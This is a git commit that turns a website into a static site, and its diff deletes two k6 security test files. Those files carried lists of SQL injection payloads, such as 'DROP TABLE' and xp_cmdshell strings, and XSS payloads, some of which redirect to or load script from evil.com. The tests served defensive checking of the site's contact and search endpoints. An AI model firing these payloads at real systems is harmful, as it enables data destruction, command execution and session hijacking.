refactor: 完成静态网站转换，移除所有 CMS 和动态功能

- 删除数据库相关代码 (src/db/)
- 删除 API 路由 (src/app/api/)
- 删除认证相关代码 (src/lib/auth/, src/providers/)
- 删除监控和安全中间件 (src/lib/security/, src/lib/monitoring/)
- 删除 hooks (use-news, use-products, use-services)
- 更新组件为静态数据源
- 添加 nginx 静态配置和部署脚本
- 添加 static-link 组件

tests/security/sql-injection-test.js

@@ -1,83 +0,0 @@
-import http from 'k6/http';
-import { check } from 'k6';
-
-export const options = {
-  thresholds: {
-    checks: ['rate==1.0'],  // 所有安全检查必须通过
-  },
-};
-
-const BASE_URL = __ENV.BASE_URL || 'http://localhost:3000';
-
-const sqlInjectionPayloads = [
-  "' OR '1'='1",
-  "' OR '1'='1' --",
-  "' OR '1'='1' /*",
-  "' OR 1=1 --",
-  "admin'--",
-  "admin'/*",
-  "' UNION SELECT NULL--",
-  "1' ORDER BY 1--",
-  "'; DROP TABLE users--",
-  "'; INSERT INTO users--",
-  "' OR SLEEP(5)--",
-  "1' AND SLEEP(5)--",
-  "'; WAITFOR DELAY '0:0:5'--",
-  "1'; EXEC xp_cmdshell('dir')--",
-  "'; EXEC master..xp_cmdshell 'dir'--",
-];
-
-export default function () {
-  let allPassed = true;
-
-  sqlInjectionPayloads.forEach((payload) => {
-    const testCases = [
-      {
-        name: 'Contact Form - SQL Injection',
-        url: `${BASE_URL}/api/contact`,
-        method: 'POST',
-        body: JSON.stringify({
-          name: payload,
-          email: 'test@example.com',
-          phone: '13800138000',
-          message: 'Test message',
-        }),
-      },
-      {
-        name: 'Search - SQL Injection',
-        url: `${BASE_URL}/api/search?q=${encodeURIComponent(payload)}`,
-        method: 'GET',
-      },
-    ];
-
-    testCases.forEach((testCase) => {
-      let res;
-      if (testCase.method === 'POST') {
-        res = http.post(testCase.url, testCase.body, {
-          headers: { 'Content-Type': 'application/json' },
-          tags: { name: testCase.name },
-        });
-      } else {
-        res = http.get(testCase.url, {
-          tags: { name: testCase.name },
-        });
-      }
-
-      const passed = check(res, {
-        'status is 200 or 400 or 422': (r) => [200, 400, 422].includes(r.status),
-        'no SQL error in response': (r) => !r.body.includes('SQL') && !r.body.includes('syntax error'),
-        'no database error in response': (r) => !r.body.includes('database') && !r.body.includes('mysql'),
-        'no stack trace in response': (r) => !r.body.includes('stack trace') && !r.body.includes('Error:'),
-      });
-
-      if (!passed) {
-        allPassed = false;
-        console.error(`SQL Injection test failed for payload: ${payload}`);
-      }
-    });
-  });
-
-  if (!allPassed) {
-    throw new Error('SQL Injection tests failed');
-  }
-}

tests/security/xss-test.js

@@ -1,98 +0,0 @@
-import http from 'k6/http';
-import { check } from 'k6';
-
-export const options = {
-  thresholds: {
-    checks: ['rate==1.0'],  // 所有安全检查必须通过
-  },
-};
-
-const BASE_URL = __ENV.BASE_URL || 'http://localhost:3000';
-
-const xssPayloads = [
-  '<script>alert("XSS")</script>',
-  '<img src=x onerror=alert("XSS")>',
-  '<svg onload=alert("XSS")>',
-  '<body onload=alert("XSS")>',
-  '<input onfocus=alert("XSS") autofocus>',
-  '<select onfocus=alert("XSS") autofocus>',
-  '<textarea onfocus=alert("XSS") autofocus>',
-  '<keygen onfocus=alert("XSS") autofocus>',
-  '<video><source onerror=alert("XSS")>',
-  '<audio src=x onerror=alert("XSS")>',
-  '<iframe src="javascript:alert("XSS")">',
-  '<details open ontoggle=alert("XSS")>',
-  '<marquee onstart=alert("XSS")>',
-  '<isindex action="javascript:alert("XSS")">',
-  '<form><button formaction="javascript:alert("XSS")">X</button></form>',
-  'javascript:alert("XSS")',
-  '<script>document.location="http://evil.com"</script>',
-  '<img src=x onerror="document.location=\'http://evil.com\'">',
-  '<svg><script>document.location="http://evil.com"</script></svg>',
-  '<script src="http://evil.com/xss.js"></script>',
-  '<link rel="stylesheet" href="javascript:alert("XSS")">',
-];
-
-export default function () {
-  let allPassed = true;
-
-  xssPayloads.forEach((payload) => {
-    const testCases = [
-      {
-        name: 'Contact Form - XSS',
-        url: `${BASE_URL}/api/contact`,
-        method: 'POST',
-        body: JSON.stringify({
-          name: payload,
-          email: 'test@example.com',
-          phone: '13800138000',
-          message: payload,
-        }),
-      },
-      {
-        name: 'Search - XSS',
-        url: `${BASE_URL}/api/search?q=${encodeURIComponent(payload)}`,
-        method: 'GET',
-      },
-    ];
-
-    testCases.forEach((testCase) => {
-      let res;
-      if (testCase.method === 'POST') {
-        res = http.post(testCase.url, testCase.body, {
-          headers: { 'Content-Type': 'application/json' },
-          tags: { name: testCase.name },
-        });
-      } else {
-        res = http.get(testCase.url, {
-          tags: { name: testCase.name },
-        });
-      }
-
-      const passed = check(res, {
-        'status is 200 or 400 or 422': (r) => [200, 400, 422].includes(r.status),
-        'XSS payload not reflected in response': (r) => {
-          const lowerBody = r.body.toLowerCase();
-          return !lowerBody.includes('<script>') &&
-                 !lowerBody.includes('onerror=') &&
-                 !lowerBody.includes('onload=') &&
-                 !lowerBody.includes('onfocus=') &&
-                 !lowerBody.includes('javascript:') &&
-                 !lowerBody.includes('document.location');
-        },
-        'no alert in response': (r) => !r.body.includes('alert('),
-        'no iframe in response': (r) => !r.body.includes('<iframe'),
-        'no external script in response': (r) => !r.body.includes('http://evil.com'),
-      });
-
-      if (!passed) {
-        allPassed = false;
-        console.error(`XSS test failed for payload: ${payload}`);
-      }
-    });
-  });
-
-  if (!allPassed) {
-    throw new Error('XSS tests failed');
-  }
-}